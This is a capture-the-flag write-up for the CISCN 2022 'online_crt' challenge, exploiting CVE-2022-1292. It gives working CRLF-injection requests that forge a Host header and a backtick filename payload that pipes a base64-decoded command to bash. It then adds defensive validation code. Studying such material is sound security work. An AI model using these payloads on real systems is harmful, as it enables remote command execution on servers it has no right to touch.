[CISCN 2022初赛] online_crt
CVE-2022-1292. The main idea: generate a certificate, then use the proxy route to send the Go server a request that renames the certificate to a filename wrapped in backticks containing a command, and finally hit the Python createlink route, which calls c_rehash and triggers the RCE.
Note the conditions the Go server imposes on renaming a file:
```go
// Rename handler on the Go server (gin). Both conditions must hold:
// RawPath is only non-empty when the request path contained an escaped
// character (such as %2f), and the Host header must be exactly "admin".
if c.Request.URL.RawPath != "" && c.Request.Host == "admin" {
    // newname is used as-is; a name containing shell metacharacters ends up
    // in the .crt directory that c_rehash later processes.
    err := os.Rename(staticPath+oldname, staticPath+newname)
    if err != nil {
        return
    }
    c.String(200, newname)
    return
}
```
The first check passes simply by replacing the / in the path with %2f; the second requires the Host to be admin, so look at how the Python proxy route is written:
```python
import socket

from flask import Flask, request

app = Flask(__name__)


@app.route('/proxy', methods=['GET'])
def proxy():
    # uri comes straight from the form body and is interpolated into the
    # raw request below without any validation.
    uri = request.form.get("uri", "/")
    client = socket.socket()
    client.connect(('localhost', 8887))
    msg = f'''GET {uri} HTTP/1.1
Host: test_api_host
User-Agent: Guest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

'''
    client.send(msg.encode())
    data = client.recv(2048)
    client.close()
    return data.decode()
```
uri is concatenated directly into the request, so there is a CRLF injection: we can inject our own Host: admin header and satisfy the Go server's rename condition.
First generate a certificate, then use the returned certificate name to rename the file:
```http
GET /proxy HTTP/1.1
Host: eci-2ze8dctuphp2eaffxazb.cloudeci1.ichunqiu.com:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 138

uri=/admin%252frename?oldname=58b2af81-92fd-42a2-a165-2ce4db8134a1.crt%26newname=`ls`.crt%20HTTP/1.1%0d%0aHost:%20admin%0d%0a%0d%0aGET%20/
```
There is no output, and curl cannot exfiltrate anything either, so just write the command output into a file and download that file directly:
```http
uri=/admin%252frename?oldname=f3d356f9-edba-44e1-a208-4696529a2173.crt%26newname=`echo%2520Y2F0IC9mKj5h|base64%2520-d|bash`.crt%20HTTP/1.1%0d%0aHost:%20admin%0d%0a%0d%0aGET%20/
```
Then request /createlink and download /static/crt/a to get the flag.
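The chain above rests on two input-handling gaps: the proxy lets CR/LF from the uri parameter become header separators, and the rename endpoint accepts any string (backticks included) as a certificate name before c_rehash runs over the directory. The following is an added example, not the challenge's or the write-up author's code, showing how both checks would be written defensively; the function names (is_safe_uri, build_proxy_request, is_valid_cert_name) are assumptions, and the only accepted certificate name shape is the <uuid>.crt form the application itself generates.

```python
import re
from urllib.parse import unquote

# Added example (not the challenge's own code): hardened versions of the two
# checks that the write-up bypasses. Function names are assumptions.

# Any ASCII control character (CR, LF, NUL, ...) has no place in a request target.
_CTL = re.compile(r"[\x00-\x1f\x7f]")

# The application only ever writes <uuid>.crt, so accept exactly that shape and
# nothing else; backticks, $(), ;, | etc. can never reach c_rehash this way.
_CERT_NAME = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\.crt$"
)


def is_safe_uri(uri: str) -> bool:
    """True only for a plain absolute path with no control characters or spaces.

    The check is applied to the value as received and to its once-percent-decoded
    form, so neither a raw CRLF nor %0d%0a (decoded later by an upstream) passes.
    """
    if not uri.startswith("/"):
        return False
    for candidate in (uri, unquote(uri)):
        if " " in candidate or _CTL.search(candidate):
            return False
    return True


def build_proxy_request(uri: str, host: str = "test_api_host") -> bytes:
    """Build the upstream GET the proxy sends.

    Host is fixed by the proxy, never derived from caller input, and the uri
    is rejected outright rather than interpolated blindly.
    """
    if not is_safe_uri(uri):
        raise ValueError("rejected uri")
    lines = [
        f"GET {uri} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Guest",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def is_valid_cert_name(name: str) -> bool:
    """Allow-list for the rename endpoint: a lowercase uuid plus .crt, nothing more."""
    return _CERT_NAME.fullmatch(name) is not None


if __name__ == "__main__":
    # Constructed inputs mirroring the write-up: the first two are what a
    # legitimate client sends, the rest are the injection shapes seen above.
    print(is_safe_uri("/admin/rename?oldname=a.crt&newname=b.crt"))   # True
    print(is_valid_cert_name("58b2af81-92fd-42a2-a165-2ce4db8134a1.crt"))  # True
    print(is_safe_uri("/x HTTP/1.1\r\nHost: admin\r\n\r\nGET /"))      # False
    print(is_safe_uri("/x%20HTTP/1.1%0d%0aHost:%20admin"))             # False
    print(is_valid_cert_name("`ls`.crt"))                              # False
```

The uri check deliberately rejects rather than sanitises: stripping CR/LF would still leave the proxy forwarding attacker-shaped request lines, whereas a hard reject makes every such attempt visible as a 4xx in the proxy's own logs. The certificate-name allow-list is what actually neutralises CVE-2022-1292 at this layer, independent of whether the OpenSSL package has been patched.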